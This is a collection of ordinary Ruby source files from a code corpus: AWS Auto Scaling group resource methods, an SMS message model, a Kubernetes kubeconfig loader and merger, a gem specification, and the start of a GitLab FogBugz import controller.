# The recurring schedule for this action, in Unix cron syntax format.
# This format consists of five fields separated by white spaces:
# \[Minute\] \[Hour\] \[Day\_of\_Month\] \[Month\_of\_Year\]
# \[Day\_of\_Week\]. The value must be in quotes (for example, `"30 0 1
# 1,6,12 *"`). For more information about this format, see [Crontab][1].
#
# When `StartTime` and `EndTime` are specified with `Recurrence`, they
# form the boundaries of when the recurring action starts and stops.
#
#
#
# [1]: http://crontab.org
# @option options [Integer] :min_size
# The minimum size of the Auto Scaling group.
# @option options [Integer] :max_size
# The maximum size of the Auto Scaling group.
# @option options [Integer] :desired_capacity
# The desired capacity is the initial capacity of the Auto Scaling group
# after the scheduled action runs and the capacity it attempts to
# maintain. It can scale beyond this capacity if you add more scaling
# conditions.
# @return [ScheduledAction]
def put_scheduled_update_group_action(options = {})
  # Scope the request to this group, issue it, then return a handle to the
  # scheduled action keyed by the caller-supplied :scheduled_action_name.
  request_params = options.merge(auto_scaling_group_name: @name)
  @client.put_scheduled_update_group_action(request_params)
  ScheduledAction.new(name: request_params[:scheduled_action_name], client: @client)
end
# @example Request syntax with placeholder values
#
# auto_scaling_group.resume_processes({
# scaling_processes: ["XmlStringMaxLen255"],
# })
# @param [Hash] options ({})
# @option options [Array<String>] :scaling_processes
# One or more of the following processes:
#
# * `Launch`
#
# * `Terminate`
#
# * `AddToLoadBalancer`
#
# * `AlarmNotification`
#
# * `AZRebalance`
#
# * `HealthCheck`
#
# * `InstanceRefresh`
#
# * `ReplaceUnhealthy`
#
# * `ScheduledActions`
#
# If you omit this parameter, all processes are specified.
# @return [EmptyStructure]
def resume_processes(options = {})
  # Scope the call to this group and hand back the raw response payload.
  @client.resume_processes(options.merge(auto_scaling_group_name: @name)).data
end
# @example Request syntax with placeholder values
#
# auto_scaling_group.set_desired_capacity({
# desired_capacity: 1, # required
# honor_cooldown: false,
# })
# @param [Hash] options ({})
# @option options [required, Integer] :desired_capacity
# The desired capacity is the initial capacity of the Auto Scaling group
# after this operation completes and the capacity it attempts to
# maintain.
# @option options [Boolean] :honor_cooldown
# Indicates whether Amazon EC2 Auto Scaling waits for the cooldown
# period to complete before initiating a scaling activity to set your
# Auto Scaling group to its new capacity. By default, Amazon EC2 Auto
# Scaling does not honor the cooldown period during manual scaling
# activities.
# @return [EmptyStructure]
def set_desired_capacity(options = {})
  # Scope the call to this group and hand back the raw response payload.
  @client.set_desired_capacity(options.merge(auto_scaling_group_name: @name)).data
end
# @example Request syntax with placeholder values
#
# auto_scaling_group.suspend_processes({
# scaling_processes: ["XmlStringMaxLen255"],
# })
# @param [Hash] options ({})
# @option options [Array<String>] :scaling_processes
# One or more of the following processes:
#
# * `Launch`
#
# * `Terminate`
#
# * `AddToLoadBalancer`
#
# * `AlarmNotification`
#
# * `AZRebalance`
#
# * `HealthCheck`
#
# * `InstanceRefresh`
#
# * `ReplaceUnhealthy`
#
# * `ScheduledActions`
#
# If you omit this parameter, all processes are specified.
# @return [EmptyStructure]
def suspend_processes(options = {})
  # Scope the call to this group and hand back the raw response payload.
  @client.suspend_processes(options.merge(auto_scaling_group_name: @name)).data
end
# @example Request syntax with placeholder values
#
# autoscalinggroup = auto_scaling_group.update({
# launch_configuration_name: "XmlStringMaxLen255",
# launch_template: {
# launch_template_id: "XmlStringMaxLen255",
# launch_template_name: "LaunchTemplateName",
# version: "XmlStringMaxLen255",
# },
# mixed_instances_policy: {
# launch_template: {
# launch_template_specification: {
# launch_template_id: "XmlStringMaxLen255",
# launch_template_name: "LaunchTemplateName",
# version: "XmlStringMaxLen255",
# },
# overrides: [
# {
# instance_type: "XmlStringMaxLen255",
# weighted_capacity: "XmlStringMaxLen32",
# launch_template_specification: {
# launch_template_id: "XmlStringMaxLen255",
# launch_template_name: "LaunchTemplateName",
# version: "XmlStringMaxLen255",
# },
# },
# ],
# },
# instances_distribution: {
# on_demand_allocation_strategy: "XmlString",
# on_demand_base_capacity: 1,
# on_demand_percentage_above_base_capacity: 1,
# spot_allocation_strategy: "XmlString",
# spot_instance_pools: 1,
# spot_max_price: "MixedInstanceSpotPrice",
# },
# },
# min_size: 1,
# max_size: 1,
# desired_capacity: 1,
# default_cooldown: 1,
# availability_zones: ["XmlStringMaxLen255"],
# health_check_type: "XmlStringMaxLen32",
# health_check_grace_period: 1,
# placement_group: "XmlStringMaxLen255",
# vpc_zone_identifier: "XmlStringMaxLen2047",
# termination_policies: ["XmlStringMaxLen1600"],
# new_instances_protected_from_scale_in: false,
# service_linked_role_arn: "ResourceName",
# max_instance_lifetime: 1,
# capacity_rebalance: false,
# })
# @param [Hash] options ({})
# @option options [String] :launch_configuration_name
# The name of the launch configuration. If you specify
# `LaunchConfigurationName` in your update request, you can't specify
# `LaunchTemplate` or `MixedInstancesPolicy`.
# @option options [Types::LaunchTemplateSpecification] :launch_template
# The launch template and version to use to specify the updates. If you
# specify `LaunchTemplate` in your update request, you can't specify
# `LaunchConfigurationName` or `MixedInstancesPolicy`.
# @option options [Types::MixedInstancesPolicy] :mixed_instances_policy
# An embedded object that specifies a mixed instances policy. When you
# make changes to an existing policy, all optional parameters are left
# unchanged if not specified. For more information, see [Auto Scaling
# groups with multiple instance types and purchase options][1] in the
# *Amazon EC2 Auto Scaling User Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/autoscaling/ec2/userguide/asg-purchase-options.html
# @option options [Integer] :min_size
# The minimum size of the Auto Scaling group.
# @option options [Integer] :max_size
# The maximum size of the Auto Scaling group.
#
# <note markdown="1"> With a mixed instances policy that uses instance weighting, Amazon EC2
# Auto Scaling may need to go above `MaxSize` to meet your capacity
# requirements. In this event, Amazon EC2 Auto Scaling will never go
# above `MaxSize` by more than your largest instance weight (weights
# that define how many units each instance contributes to the desired
# capacity of the group).
#
# </note>
# @option options [Integer] :desired_capacity
# The desired capacity is the initial capacity of the Auto Scaling group
# after this operation completes and the capacity it attempts to
# maintain. This number must be greater than or equal to the minimum
# size of the group and less than or equal to the maximum size of the
# group.
# @option options [Integer] :default_cooldown
# The amount of time, in seconds, after a scaling activity completes
# before another scaling activity can start. The default value is `300`.
# This setting applies when using simple scaling policies, but not when
# using other scaling policies or scheduled scaling. For more
# information, see [Scaling cooldowns for Amazon EC2 Auto Scaling][1] in
# the *Amazon EC2 Auto Scaling User Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/autoscaling/ec2/userguide/Cooldown.html
# @option options [Array<String>] :availability_zones
# One or more Availability Zones for the group.
# @option options [String] :health_check_type
# The service to use for the health checks. The valid values are `EC2`
# and `ELB`. If you configure an Auto Scaling group to use ELB health
# checks, it considers the instance unhealthy if it fails either the EC2
# status checks or the load balancer health checks.
# @option options [Integer] :health_check_grace_period
# The amount of time, in seconds, that Amazon EC2 Auto Scaling waits
# before checking the health status of an EC2 instance that has come
# into service. The default value is `0`. For more information, see
# [Health check grace period][1] in the *Amazon EC2 Auto Scaling User
# Guide*.
#
# Conditional: Required if you are adding an `ELB` health check.
#
#
#
# [1]: https://docs.aws.amazon.com/autoscaling/ec2/userguide/healthcheck.html#health-check-grace-period
# @option options [String] :placement_group
# The name of an existing placement group into which to launch your
# instances, if any. A placement group is a logical grouping of
# instances within a single Availability Zone. You cannot specify
# multiple Availability Zones and a placement group. For more
# information, see [Placement Groups][1] in the *Amazon EC2 User Guide
# for Linux Instances*.
#
#
#
# [1]: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/placement-groups.html
# @option options [String] :vpc_zone_identifier
# A comma-separated list of subnet IDs for a virtual private cloud
# (VPC). If you specify `VPCZoneIdentifier` with `AvailabilityZones`,
# the subnets that you specify for this parameter must reside in those
# Availability Zones.
# @option options [Array<String>] :termination_policies
# A policy or a list of policies that are used to select the instances
# to terminate. The policies are executed in the order that you list
# them. For more information, see [Controlling which Auto Scaling
# instances terminate during scale in][1] in the *Amazon EC2 Auto
# Scaling User Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/autoscaling/ec2/userguide/as-instance-termination.html
# @option options [Boolean] :new_instances_protected_from_scale_in
# Indicates whether newly launched instances are protected from
# termination by Amazon EC2 Auto Scaling when scaling in. For more
# information about preventing instances from terminating on scale in,
# see [Instance scale-in protection][1] in the *Amazon EC2 Auto Scaling
# User Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/autoscaling/ec2/userguide/as-instance-termination.html#instance-protection
# @option options [String] :service_linked_role_arn
# The Amazon Resource Name (ARN) of the service-linked role that the
# Auto Scaling group uses to call other AWS services on your behalf. For
# more information, see [Service-linked roles][1] in the *Amazon EC2
# Auto Scaling User Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/autoscaling/ec2/userguide/autoscaling-service-linked-role.html
# @option options [Integer] :max_instance_lifetime
# The maximum amount of time, in seconds, that an instance can be in
# service. The default is null. If specified, the value must be either 0
# or a number equal to or greater than 86,400 seconds (1 day). To clear
# a previously set value, specify a new value of 0. For more
# information, see [Replacing Auto Scaling instances based on maximum
# instance lifetime][1] in the *Amazon EC2 Auto Scaling User Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/autoscaling/ec2/userguide/asg-max-instance-lifetime.html
# @option options [Boolean] :capacity_rebalance
# Enables or disables Capacity Rebalancing. For more information, see
# [Amazon EC2 Auto Scaling Capacity Rebalancing][1] in the *Amazon EC2
# Auto Scaling User Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/autoscaling/ec2/userguide/capacity-rebalance.html
# @return [AutoScalingGroup]
def update(options = {})
  # Apply the update, then return a fresh resource handle for the group
  # (the group name cannot change, so the merged name is reused).
  request_params = options.merge(auto_scaling_group_name: @name)
  @client.update_auto_scaling_group(request_params)
  AutoScalingGroup.new(name: request_params[:auto_scaling_group_name], client: @client)
end
# @!group Associations
# @example Request syntax with placeholder values
#
# activities = auto_scaling_group.activities({
# activity_ids: ["XmlString"],
# })
# @param [Hash] options ({})
# @option options [Array<String>] :activity_ids
# The activity IDs of the desired scaling activities. You can specify up
# to 50 IDs. If you omit this parameter, all activities for the past six
# weeks are described. If unknown activities are requested, they are
# ignored with no error. If you specify an Auto Scaling group, the
# results are limited to that group.
# @return [Activity::Collection]
def activities(options = {})
  # Lazily paginate: nothing is requested until the collection is iterated.
  batches = Enumerator.new do |y|
    resp = @client.describe_scaling_activities(options.merge(auto_scaling_group_name: @name))
    resp.each_page do |page|
      y.yield(page.data.activities.map do |activity|
        Activity.new(id: activity.activity_id, data: activity, client: @client)
      end)
    end
  end
  Activity::Collection.new(batches)
end
# @return [Instance::Collection]
def instances
  # Instances come embedded in this group's already-loaded data; no extra
  # API call is made here.
  batch = data[:instances].map do |item|
    Instance.new(group_name: @name, id: item[:instance_id], data: item, client: @client)
  end
  Instance::Collection.new([batch], size: batch.size)
end
# @return [LaunchConfiguration, nil]
def launch_configuration
  # Groups created from a launch template have no launch configuration name.
  config_name = data[:launch_configuration_name]
  return nil unless config_name

  LaunchConfiguration.new(name: config_name, client: @client)
end
# @param [String] name
# @return [LifecycleHook]
def lifecycle_hook(name)
  # Builds a lazy resource handle; no API call is made here.
  LifecycleHook.new(
    group_name: @name,
    name: name,
    client: @client
  )
end
# @example Request syntax with placeholder values
#
# lifecycle_hooks = auto_scaling_group.lifecycle_hooks({
# lifecycle_hook_names: ["AsciiStringMaxLen255"],
# })
# @param [Hash] options ({})
# @option options [Array<String>] :lifecycle_hook_names
# The names of one or more lifecycle hooks. If you omit this parameter,
# all lifecycle hooks are described.
# @return [LifecycleHook::Collection]
def lifecycle_hooks(options = {})
  # Single-page API: describe_lifecycle_hooks is not paginated, so the
  # enumerator yields exactly one batch when iterated.
  batches = Enumerator.new do |y|
    resp = @client.describe_lifecycle_hooks(options.merge(auto_scaling_group_name: @name))
    y.yield(resp.data.lifecycle_hooks.map do |hook|
      LifecycleHook.new(
        group_name: hook.auto_scaling_group_name,
        name: hook.lifecycle_hook_name,
        data: hook,
        client: @client
      )
    end)
  end
  LifecycleHook::Collection.new(batches)
end
# @param [String] name
# @return [LoadBalancer]
def load_balancer(name)
  # Builds a lazy resource handle; no API call is made here.
  LoadBalancer.new(
    group_name: @name,
    name: name,
    client: @client
  )
end
# @example Request syntax with placeholder values
#
# load_balancers = auto_scaling_group.load_balancers({
# next_token: "XmlString",
# max_records: 1,
# })
# @param [Hash] options ({})
# @option options [String] :next_token
# The token for the next set of items to return. (You received this
# token from a previous call.)
# @option options [Integer] :max_records
# The maximum number of items to return with this call. The default
# value is `100` and the maximum value is `100`.
# @return [LoadBalancer::Collection]
def load_balancers(options = {})
  # Yields one batch per describe_load_balancers call when iterated.
  batches = Enumerator.new do |y|
    resp = @client.describe_load_balancers(options.merge(auto_scaling_group_name: @name))
    y.yield(resp.data.load_balancers.map do |lb|
      LoadBalancer.new(
        group_name: @name,
        name: lb.load_balancer_name,
        data: lb,
        client: @client
      )
    end)
  end
  LoadBalancer::Collection.new(batches)
end
# @example Request syntax with placeholder values
#
# auto_scaling_group.notification_configurations()
# @param [Hash] options ({})
# @return [NotificationConfiguration::Collection]
def notification_configurations(options = {})
  # Lazily paginate; the API takes a list of group names, so deep_merge is
  # used to append this group without clobbering caller-supplied names.
  batches = Enumerator.new do |y|
    merged = Aws::Util.deep_merge(options, auto_scaling_group_names: [@name])
    resp = @client.describe_notification_configurations(merged)
    resp.each_page do |page|
      y.yield(page.data.notification_configurations.map do |config|
        NotificationConfiguration.new(
          group_name: config.auto_scaling_group_name,
          type: config.notification_type,
          topic_arn: config.topic_arn,
          data: config,
          client: @client
        )
      end)
    end
  end
  NotificationConfiguration::Collection.new(batches)
end
# @example Request syntax with placeholder values
#
# policies = auto_scaling_group.policies({
# policy_names: ["ResourceName"],
# policy_types: ["XmlStringMaxLen64"],
# })
# @param [Hash] options ({})
# @option options [Array<String>] :policy_names
# The names of one or more policies. If you omit this parameter, all
# policies are described. If a group name is provided, the results are
# limited to that group. This list is limited to 50 items. If you
# specify an unknown policy name, it is ignored with no error.
# @option options [Array<String>] :policy_types
# One or more policy types. The valid values are `SimpleScaling`,
# `StepScaling`, and `TargetTrackingScaling`.
# @return [ScalingPolicy::Collection]
def policies(options = {})
  # Lazily paginate scaling policies scoped to this group.
  batches = Enumerator.new do |y|
    resp = @client.describe_policies(options.merge(auto_scaling_group_name: @name))
    resp.each_page do |page|
      y.yield(page.data.scaling_policies.map do |policy|
        ScalingPolicy.new(name: policy.policy_name, data: policy, client: @client)
      end)
    end
  end
  ScalingPolicy::Collection.new(batches)
end
# @example Request syntax with placeholder values
#
# scheduled_actions = auto_scaling_group.scheduled_actions({
# scheduled_action_names: ["XmlStringMaxLen255"],
# start_time: Time.now,
# end_time: Time.now,
# })
# @param [Hash] options ({})
# @option options [Array<String>] :scheduled_action_names
# The names of one or more scheduled actions. You can specify up to 50
# actions. If you omit this parameter, all scheduled actions are
# described. If you specify an unknown scheduled action, it is ignored
# with no error.
# @option options [Time,DateTime,Date,Integer,String] :start_time
# The earliest scheduled start time to return. If scheduled action names
# are provided, this parameter is ignored.
# @option options [Time,DateTime,Date,Integer,String] :end_time
# The latest scheduled start time to return. If scheduled action names
# are provided, this parameter is ignored.
# @return [ScheduledAction::Collection]
def scheduled_actions(options = {})
  # Lazily paginate scheduled actions scoped to this group.
  batches = Enumerator.new do |y|
    resp = @client.describe_scheduled_actions(options.merge(auto_scaling_group_name: @name))
    resp.each_page do |page|
      y.yield(page.data.scheduled_update_group_actions.map do |action|
        ScheduledAction.new(name: action.scheduled_action_name, data: action, client: @client)
      end)
    end
  end
  ScheduledAction::Collection.new(batches)
end
# @param [String] key
# @return [Tag]
def tag(key)
  # Builds a lazy Tag handle; resource_type is fixed for Auto Scaling groups.
  Tag.new(
    key: key,
    resource_id: @name,
    resource_type: "auto-scaling-group",
    client: @client
  )
end
# @return [Tag::Collection]
def tags
  # Tags come embedded in this group's already-loaded data; no extra API call.
  batch = data[:tags].map do |item|
    Tag.new(
      key: item[:key],
      resource_id: item[:resource_id],
      resource_type: item[:resource_type],
      data: item,
      client: @client
    )
  end
  Tag::Collection.new([batch], size: batch.size)
end
# @deprecated
# @api private
def identifiers
  # Hash of the identifiers that uniquely reference this group (name only).
  { name: @name }
end
deprecated(:identifiers)
private
# Resolves the group name from either the first positional argument or the
# :name option (which is removed from the options hash when used).
#
# @param args [Array] positional constructor arguments
# @param options [Hash] keyword constructor arguments
# @raise [ArgumentError] when the name is missing or not a String
# @return [String]
def extract_name(args, options)
  value = args[0] || options.delete(:name)
  raise ArgumentError, "missing required option :name" if value.nil?
  return value if value.is_a?(String)

  raise ArgumentError, "expected :name to be a String, got #{value.class}"
end
# Yields the underlying waiter to the caller's block, emitting a one-time
# deprecation notice per resource instance.
def yield_waiter_and_warn(waiter, &block)
  unless @waiter_block_warned
    warn("pass options to configure the waiter; yielding the waiter is deprecated")
    @waiter_block_warned = true
  end
  yield(waiter.waiter)
end
# Splits a mixed options hash into waiter configuration (known waiter keys)
# and waiter parameters (everything else); defaults the waiter client to
# this resource's client.
#
# @param options [Hash]
# @return [Array(Hash, Hash)] [waiter_opts, waiter_params]
def separate_params_and_options(options)
  waiter_option_keys = [:client, :max_attempts, :delay, :before_attempt, :before_wait]
  waiter_opts, waiter_params =
    options.partition { |key, _value| waiter_option_keys.include?(key) }.map(&:to_h)
  waiter_opts[:client] ||= @client
  [waiter_opts, waiter_params]
end
class Collection < Aws::Resources::Collection; end
end
end
| 35.431965 | 179 | 0.638505 |
87dd1b591d2b89b6c051972ec4688541980ef15b | 173 | FactoryBot.define do
factory :email_subscription do
oidc_user
sequence(:name) { |n| "subscription-#{n}" }
sequence(:topic_slug) { |n| "topic-#{n}" }
end
end
| 21.625 | 47 | 0.641618 |
017582375bfd6a6f4c4e522065489f532b2abf06 | 3,183 | # This file was automatically generated for ClickSend by APIMATIC v2.0 ( https://apimatic.io ).
module ClickSend
class SmsMessage < BaseModel
  # Sending method, e.g. 'wordpress', 'php', 'c#'.
  # @return [String]
  attr_accessor :source

  # Sender id. See http://help.clicksend.com/SMS/what-is-a-sender-id-or-sender-number.
  # @return [String]
  attr_accessor :from

  # Message text.
  # @return [String]
  attr_accessor :body

  # Recipient phone number in E.164 format.
  # @return [String]
  attr_accessor :to

  # Unix timestamp for scheduled delivery; blank means immediate delivery.
  # See http://help.clicksend.com/what-is-a-unix-timestamp
  # @return [Integer]
  attr_accessor :schedule

  # Caller reference, passed back with all replies and delivery reports.
  # @return [String]
  attr_accessor :custom_string

  # List ID when sending to a whole list; can be used instead of 'to'.
  # @return [Integer]
  attr_accessor :list_id

  # Recipient country.
  # @return [String]
  attr_accessor :country

  # Email address replies should be forwarded to; if omitted, replies go
  # back to the user who sent the outgoing SMS.
  # @return [String]
  attr_accessor :from_email

  # A mapping from model property names to API property names (identity
  # mapping for this model), memoized at the class level.
  def self.names
    @_hash ||= %w[source from body to schedule custom_string
                  list_id country from_email].each_with_object({}) do |key, map|
      map[key] = key
    end
    @_hash
  end

  def initialize(source = nil, from = nil, body = nil, to = nil,
                 schedule = nil, custom_string = nil, list_id = nil,
                 country = nil, from_email = nil)
    @source        = source
    @from          = from
    @body          = body
    @to            = to
    @schedule      = schedule
    @custom_string = custom_string
    @list_id       = list_id
    @country       = country
    @from_email    = from_email
  end

  # Creates an instance of the object from a hash with string keys.
  # Returns nil when given a nil/false hash.
  def self.from_hash(hash)
    return nil unless hash

    SmsMessage.new(
      hash['source'],
      hash['from'],
      hash['body'],
      hash['to'],
      hash['schedule'],
      hash['custom_string'],
      hash['list_id'],
      hash['country'],
      hash['from_email']
    )
  end
end
end
| 30.028302 | 143 | 0.545712 |
33302b812e233027bbdad210673dd2a629336387 | 8,069 | # frozen_string_literal: true
require 'dry-struct'
require 'dry-types'
require 'base64'
require 'yaml'
module K8s
# Common struct type for kubeconfigs:
#
# * converts string keys to symbols
# * normalizes foo-bar to foo_bar
class ConfigStruct < Dry::Struct
  # Normalize incoming keys: a String "foo-bar" becomes :foo_bar; any
  # other key type passes through unchanged.
  transform_keys do |key|
    key.is_a?(String) ? key.tr('-', '_').to_sym : key
  end
end
# @see https://godoc.org/k8s.io/client-go/tools/clientcmd/api/v1#Config
class Config < ConfigStruct
# Common dry-types for config
class Types
  # Pulls the Dry::Types builder constants (String, Bool, Hash, ...) into
  # this namespace so the attribute declarations below can reference them.
  include Dry::Types()
end
# structured cluster
class Cluster < ConfigStruct
  # The API server URL is the only mandatory field; TLS-related fields
  # are optional (file path vs inline base64 data variants).
  attribute :server, Types::String
  attribute :insecure_skip_tls_verify,
            Types::Bool.optional.default(nil, shared: true)
  attribute :certificate_authority,
            Types::String.optional.default(nil, shared: true)
  attribute :certificate_authority_data,
            Types::String.optional.default(nil, shared: true)
  attribute :extensions,
            Types::Strict::Array.optional.default(nil, shared: true)
end

# structured cluster with name
class NamedCluster < ConfigStruct
  attribute :name, Types::String
  attribute :cluster, Cluster
end
# structured user auth provider
class UserAuthProvider < ConfigStruct
  attribute :name, Types::String
  attribute :config, Types::Strict::Hash
end

# structured user exec
class UserExec < ConfigStruct
  attribute :command, Types::String
  attribute :apiVersion, Types::String
  # shared: true added for consistency with every other optional default in
  # this file (harmless for a nil default; keeps dry-types default handling
  # uniform across attributes).
  attribute :env, Types::Strict::Array.of(Types::Hash).optional.default(nil, shared: true)
  attribute :args, Types::Strict::Array.of(Types::String).optional.default(nil, shared: true)
end
# structured user
class User < ConfigStruct
  # Client TLS credentials: file-path or inline base64-data variants.
  attribute :client_certificate, Types::String.optional.default(nil, shared: true)
  attribute :client_certificate_data, Types::String.optional.default(nil, shared: true)
  attribute :client_key, Types::String.optional.default(nil, shared: true)
  attribute :client_key_data, Types::String.optional.default(nil, shared: true)
  # Token auth: literal token or a file containing it.
  attribute :token, Types::String.optional.default(nil, shared: true)
  attribute :tokenFile, Types::String.optional.default(nil, shared: true)
  # Impersonation fields.
  attribute :as, Types::String.optional.default(nil, shared: true)
  attribute :as_groups, Types::Array.of(Types::String).optional.default(nil, shared: true)
  attribute :as_user_extra, Types::Hash.optional.default(nil, shared: true)
  # Basic auth.
  attribute :username, Types::String.optional.default(nil, shared: true)
  attribute :password, Types::String.optional.default(nil, shared: true)
  # External auth: provider plugin config or exec-based credential plugin.
  attribute :auth_provider, UserAuthProvider.optional.default(nil, shared: true)
  attribute :exec, UserExec.optional.default(nil, shared: true)
  attribute :extensions, Types::Strict::Array.optional.default(nil, shared: true)
end

# structured user with name
class NamedUser < ConfigStruct
  attribute :name, Types::String
  attribute :user, User
end
# structured context
#
# Refers to other named User/cluster objects within the same config.
class Context < ConfigStruct
  attribute :cluster, Types::Strict::String
  attribute :user, Types::Strict::String
  attribute :namespace, Types::Strict::String.optional.default(nil, shared: true)
  attribute :extensions, Types::Strict::Array.optional.default(nil, shared: true)
end

# named context
class NamedContext < ConfigStruct
  attribute :name, Types::String
  attribute :context, Context
end
# Top-level kubeconfig fields; all optional, defaulting to an empty config.
attribute :kind, Types::Strict::String.optional.default(nil, shared: true)
attribute :apiVersion, Types::Strict::String.optional.default(nil, shared: true)
attribute :preferences, Types::Strict::Hash.optional.default(proc { {} }, shared: true)
attribute :clusters, Types::Strict::Array.of(NamedCluster).optional.default(proc { [] }, shared: true)
attribute :users, Types::Strict::Array.of(NamedUser).optional.default(proc { [] }, shared: true)
attribute :contexts, Types::Strict::Array.of(NamedContext).optional.default(proc { [] }, shared: true)
attribute :current_context, Types::Strict::String.optional.default(nil, shared: true)
attribute :extensions, Types::Strict::Array.optional.default(proc { [] }, shared: true)
# Loads a configuration from a YAML file
#
# @param path [String]
# @return [K8s::Config]
def self.load_file(path)
  raw = File.read(File.expand_path(path))
  # Only Time/Date classes and YAML aliases are permitted when parsing
  # untrusted kubeconfig content.
  parsed = YAML.safe_load(
    raw,
    permitted_classes: [Time, DateTime, Date],
    permitted_symbols: [],
    aliases: true
  )
  new(parsed)
end
# Loads configuration files listed in KUBE_CONFIG environment variable and
# merge using the configuration merge rules, @see K8s::Config.merge
#
# @param kubeconfig [String] by default read from ENV['KUBECONFIG']
def self.from_kubeconfig_env(kubeconfig = nil)
  kubeconfig ||= ENV.fetch('KUBECONFIG', '')
  raise ArgumentError, "KUBECONFIG not set" if kubeconfig.empty?

  # Split on ':' path separators using a negative LOOKBEHIND so escaped
  # colons ("\:") inside a path are not treated as separators. The previous
  # lookahead form /(?!\\):/ was vacuous — the character after the
  # assertion is always ':' — so it split on every colon, escaped or not.
  paths = kubeconfig.split(/(?<!\\):/)
  # Merge left-to-right per kubeconfig precedence rules (see #merge).
  paths.inject(load_file(paths.shift)) do |memo, other_cfg|
    memo.merge(load_file(other_cfg))
  end
end
# Build a minimal configuration from at least a server address, server certificate authority data and an access token.
#
# @param server [String] kubernetes server address
# @param ca [String] server certificate authority data (base64 encoded)
# @param token [String] access token
# @param cluster_name [String] cluster name
# @param user [String] user name
# @param context [String] context name
# @param options [Hash] (see #initialize)
def self.build(server:, ca:, auth_token:, cluster_name: 'kubernetes', user: 'k8s-client', context: 'k8s-client', **options)
  new(
    {
      # Wire a single cluster/user/context trio together and preselect it;
      # any extra top-level fields can be injected via **options.
      clusters: [{ name: cluster_name, cluster: { server: server, certificate_authority_data: ca } }],
      users: [{ name: user, user: { token: auth_token } }],
      contexts: [{ name: context, context: { cluster: cluster_name, user: user } }],
      current_context: context
    }.merge(options)
  )
end
# Merges configuration according to the rules specified in
# https://kubernetes.io/docs/concepts/configuration/organize-cluster-access-kubeconfig/#merging-kubeconfig-files
#
# @param other [Hash, K8s::Config]
# @return [K8s::Config]
def merge(other)
  old_attributes = attributes
  # Accept either a plain Hash or another Config instance.
  other_attributes = other.is_a?(Hash) ? other : other.attributes

  # NOTE(review): merge! mutates the hash returned by #attributes — this
  # assumes dry-struct hands back a copy rather than aliasing internal
  # state; verify against the dry-struct version in use.
  old_attributes.merge!(other_attributes) do |key, old_value, new_value|
    case key
    when :clusters, :contexts, :users
      # Named lists: keep all existing entries and append only incoming
      # entries whose :name is not already present (first file wins).
      old_value + new_value.reject do |new_mapping|
        old_value.any? { |old_mapping| old_mapping[:name] == new_mapping[:name] }
      end
    else
      case old_value
      when Array
        # Plain arrays: union, preserving first-seen order.
        (old_value + new_value).uniq
      when Hash
        # Hashes: keep existing non-nil values; fill gaps from incoming.
        old_value.merge(new_value) do |_key, inner_old_value, inner_new_value|
          inner_old_value.nil? ? inner_new_value : inner_old_value
        end
      when NilClass
        # Unset on this side: take the incoming value.
        new_value
      else
        # Scalars: the existing value wins.
        old_value
      end
    end
  end
  self.class.new(old_attributes)
end
# @param name [String]
# @raise [K8s::Error::Configuration]
# @return [K8s::Config::Context]
def context(name = current_context)
  match = contexts.find { |named| named.name == name }
  raise K8s::Error::Configuration, "context not found: #{name.inspect}" if match.nil?

  match.context
end
# @param name [String]
# @return [K8s::Config::Cluster]
def cluster(name = context.cluster)
  # NOTE(review): raises NoMethodError on nil when the name is not found,
  # unlike #context which raises K8s::Error::Configuration — confirm intended.
  clusters.find{ |cluster| cluster.name == name }.cluster
end
# @param name [String]
# @return [K8s::Config::User]
def user(name = context.user)
  # NOTE(review): raises NoMethodError on nil when the name is not found,
  # unlike #context which raises K8s::Error::Configuration — confirm intended.
  users.find{ |user| user.name == name }.user
end
end
end
| 37.013761 | 127 | 0.66489 |
38ff40e86107f9b7c8fd48b27b200578318680d2 | 1,273 | # -*- encoding: utf-8 -*-
$:.push File.expand_path('../lib', __FILE__)
require 'suspenders/version'
require 'date'
Gem::Specification.new do |s|
  s.required_ruby_version = ">= #{Suspenders::RUBY_VERSION}"
  s.authors = ['thoughtbot', 'kiramclean']
  # Release date is stamped at packaging time.
  s.date = Date.today.strftime('%Y-%m-%d')
  s.description = <<-HERE
    This is a base Rails project that you can upgrade. It's forked from Thoughbot's
    suspenders gem. I use to get a head start on building a working app. Use
    Suspenders if you're in a rush to build something amazing; don't use it
    if you like missing deadlines.
  HERE
  s.email = '[email protected]'
  s.executables = ['kiras-suspenders']
  s.extra_rdoc_files = %w[README.md LICENSE]
  # Package exactly the files tracked by git.
  s.files = `git ls-files`.split("\n")
  s.homepage = 'https://github.com/kiramclean/kiras-suspenders'
  s.license = 'MIT'
  s.name = 'kiras-suspenders'
  s.rdoc_options = ['--charset=UTF-8']
  s.require_paths = ['lib']
  s.summary = "Generate a Rails app using thoughtbot's best practices and my custom defaults."
  s.test_files = `git ls-files -- {test,spec,features}/*`.split("\n")
  # Version constants come from lib/suspenders/version, required above.
  s.version = Suspenders::VERSION

  s.add_dependency 'bundler', '~> 1.3'
  s.add_dependency 'rails', Suspenders::RAILS_VERSION
  s.add_development_dependency 'rspec', '~> 3.2'
end
| 35.361111 | 94 | 0.696779 |
28ead8d44dac0f93a334939a04f21da39ea20183 | 2,934 | # frozen_string_literal: true
class Import::FogbugzController < Import::BaseController
before_action :verify_fogbugz_import_enabled
before_action :user_map, only: [:new_user_map, :create_user_map]
rescue_from Fogbugz::AuthenticationException, with: :fogbugz_unauthorized
def new
end
def callback
begin
res = Gitlab::FogbugzImport::Client.new(import_params.to_h.symbolize_keys)
rescue
# If the URI is invalid various errors can occur
return redirect_to new_import_fogbugz_path, alert: _('Could not connect to FogBugz, check your URL')
end
session[:fogbugz_token] = res.get_token
session[:fogbugz_uri] = params[:uri]
redirect_to new_user_map_import_fogbugz_path
end
def new_user_map
end
def create_user_map
user_map = user_map_params.to_h[:users]
unless user_map.is_a?(Hash) && user_map.all? { |k, v| !v[:name].blank? }
flash.now[:alert] = _('All users must have a name.')
return render 'new_user_map'
end
session[:fogbugz_user_map] = user_map
flash[:notice] = _('The user map has been saved. Continue by selecting the projects you want to import.')
redirect_to status_import_fogbugz_path
end
# rubocop: disable CodeReuse/ActiveRecord
def status
unless client.valid?
return redirect_to new_import_fogbugz_path
end
@repos = client.repos
@already_added_projects = find_already_added_projects('fogbugz')
